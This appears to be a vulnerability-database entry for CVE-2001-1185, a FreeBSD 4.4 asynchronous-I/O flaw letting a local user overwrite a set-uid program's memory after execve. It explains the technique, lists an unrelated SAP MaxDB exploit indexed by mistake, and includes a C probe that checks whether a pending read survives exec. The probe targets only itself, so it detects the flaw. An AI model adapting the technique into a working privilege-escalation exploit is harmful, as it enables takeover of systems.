CVE-2001-1185
Published 2001-12-10
Priority P4 · CVSS 2.0: 6.2 (medium) · vector AV:L/AC:H/Au:N/C:C/I:C/A:C
Exploit available · EPSS 0.81% (52.3rd percentile)
Some AIO operations in FreeBSD 4.4 may be delayed until after a call to execve, which could allow a local user to overwrite memory of the new process and gain privileges.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
No detection rules found.
Exploit-DB (indexed under CVE-2010-1185; unrelated to CVE-2001-1185)
SAP MaxDB - Malformed Handshake Request Remote Code Execution
exploitdb · 2010-03-26 · CVE-2010-1185 · ZDI-10-032
Author: S2 Crew [Hungary]; version 7.7.06.09; tested on Windows XP SP2 EN; software link: sap.com
Exploit-DB
FreeBSD 4.4 - AIO Library Cross Process Memory Write
exploitdb · 2001-12-10 · CVE-2001-1185
---
// source: https://www.securityfocus.com/bid/3661/info
aio.h declares the POSIX asynchronous I/O interface; on FreeBSD the implementation lives in the kernel and is enabled by building the kernel with the VFS_AIO option, which the default kernel configuration does not set.
Under some circumstances a pending read from an input socket persists through a call to execve. When data eventually arrives, the kernel completes the read into the buffer address that the old image supplied, and that address now lies inside the address space of the new process.
A local user who writes a program that queues such a read and then executes a set-uid binary can therefore overwrite an attacker-chosen address in the set-uid process with attacker-controlled data. This can lead directly to escalated privileges.
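The sequence described above, as an added example that is not the page's `tao` exploit and not FreeBSD code: a C probe that queues an `aio_read()` on an empty pipe, `execve()`s itself, and in the new image checks whether data written after the exec lands at the address the old image handed to the kernel. It assumes Linux's `/proc/self/exe` for re-executing itself (FreeBSD procfs exposes `/proc/curproc/file` instead), a 64-bit address space, POSIX AIO from libc (older glibc needs `-lrt`), and GCC/Clang constructor attributes; the `AIO_PROBE_*` environment names, the address hints and the `'X'` payload are the example's own. On a kernel with the FreeBSD 4.4 behaviour the probe returns 1; on current kernels, and on glibc, whose AIO is thread-based and dies with the old image at exec, it returns 0.

```c
/* aio_exec_probe.c: does a queued aio_read() outlive execve()?  (added example) */
#define _GNU_SOURCE
#include <aio.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

#define SELF_EXE  "/proc/self/exe"    /* assumption: Linux procfs (FreeBSD: /proc/curproc/file) */
#define ENV_STAGE "AIO_PROBE_STAGE2"  /* the AIO_PROBE_* names are this example's own */
#define ENV_ADDR  "AIO_PROBE_ADDR"
#define ENV_WRFD  "AIO_PROBE_WRFD"
#define PAGE_LEN  4096
#define REQ_LEN   64
#define MARK      0x41

/* Map one page at exactly `hint`, or return NULL. No MAP_FIXED is used, so an
 * existing mapping is never clobbered; we only check that the kernel honoured the hint. */
static unsigned char *map_at(uintptr_t hint) {
    void *p = mmap((void *)hint, PAGE_LEN, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return NULL;
    if ((uintptr_t)p != hint) { munmap(p, PAGE_LEN); return NULL; }
    return p;
}

/* Stage 2 runs inside the freshly exec'd image, before main(). It stands in for the
 * set-uid target of the advisory: it owns the address the old image queued its
 * aio_read() into, fills it with a marker, then lets the read's data source deliver. */
__attribute__((constructor)) static void stage2(void) {
    if (!getenv(ENV_STAGE) || !getenv(ENV_ADDR) || !getenv(ENV_WRFD)) return;
    uintptr_t addr = (uintptr_t)strtoull(getenv(ENV_ADDR), NULL, 16);
    int wrfd = atoi(getenv(ENV_WRFD));
    unsigned char *p = map_at(addr);
    if (!p) _exit(3);                            /* address not reusable here: inconclusive */
    memset(p, MARK, PAGE_LEN);
    unsigned char payload[REQ_LEN];              /* constructed data, not from the advisory */
    memset(payload, 'X', sizeof payload);
    if (write(wrfd, payload, sizeof payload) != (ssize_t)sizeof payload) _exit(3);
    usleep(200 * 1000);                          /* give a stale kernel request time to land */
    _exit(p[0] == MARK ? 0 : 1);                 /* 1: the old image's read wrote into us */
}

/* Stage 1: in a child, queue aio_read() on an empty pipe, then execve() SELF_EXE.
 * Returns 0 (request did not survive exec), 1 (it did: the CVE-2001-1185 behaviour),
 * or -1 (inconclusive: fork, exec or mapping problem). */
int probe_aio_survives_exec(void) {
    static const uintptr_t hints[] = { 0x1000000000ULL, 0x3000000000ULL, 0x200000000000ULL };
    int fds[2];
    if (pipe(fds) != 0) return -1;               /* no O_CLOEXEC: both ends cross the exec */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        unsigned char *buf = NULL;
        for (size_t i = 0; i < sizeof hints / sizeof hints[0] && !buf; i++)
            buf = map_at(hints[i]);
        if (!buf) _exit(3);
        struct aiocb cb;
        memset(&cb, 0, sizeof cb);
        cb.aio_fildes = fds[0];                  /* nothing written yet, so the read stays pending */
        cb.aio_buf    = buf;
        cb.aio_nbytes = REQ_LEN;
        if (aio_read(&cb) != 0) _exit(3);
        char addr[32], wrfd[16];
        snprintf(addr, sizeof addr, "%llx", (unsigned long long)(uintptr_t)buf);
        snprintf(wrfd, sizeof wrfd, "%d", fds[1]);
        setenv(ENV_STAGE, "1", 1);
        setenv(ENV_ADDR, addr, 1);
        setenv(ENV_WRFD, wrfd, 1);
        char *const argv[] = { "aio-probe", NULL };
        execv(SELF_EXE, argv);                   /* the new image is inspected by stage2() */
        _exit(3);                                /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    close(fds[0]);
    close(fds[1]);
    if (!WIFEXITED(status)) return -1;
    int rc = WEXITSTATUS(status);
    return rc == 0 ? 0 : rc == 1 ? 1 : -1;
}

int main(void) {
    int r = probe_aio_survives_exec();
    printf("aio_read() survives execve(): %s\n",
           r == 1 ? "YES (vulnerable)" : r == 0 ? "no" : "inconclusive");
    return r == 1;
}
```

The probe deliberately re-executes itself rather than a set-uid binary: the question it answers is whether the kernel cancels outstanding AIO at exec, and that is visible without any privilege boundary. A non-zero exit from the exec'd image is the signal a harness can act on, and the address hints are retried because the new image must be able to re-map the exact address the old one used.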
/* tao - FreeBSD Local AIO
No writeups or analysis indexed.
References:
- http://www.iss.net/security_center/static/7693.php
- http://www.osvdb.org/2001
- http://www.securityfocus.com/archive/1/244583
- http://www.securityfocus.com/bid/3661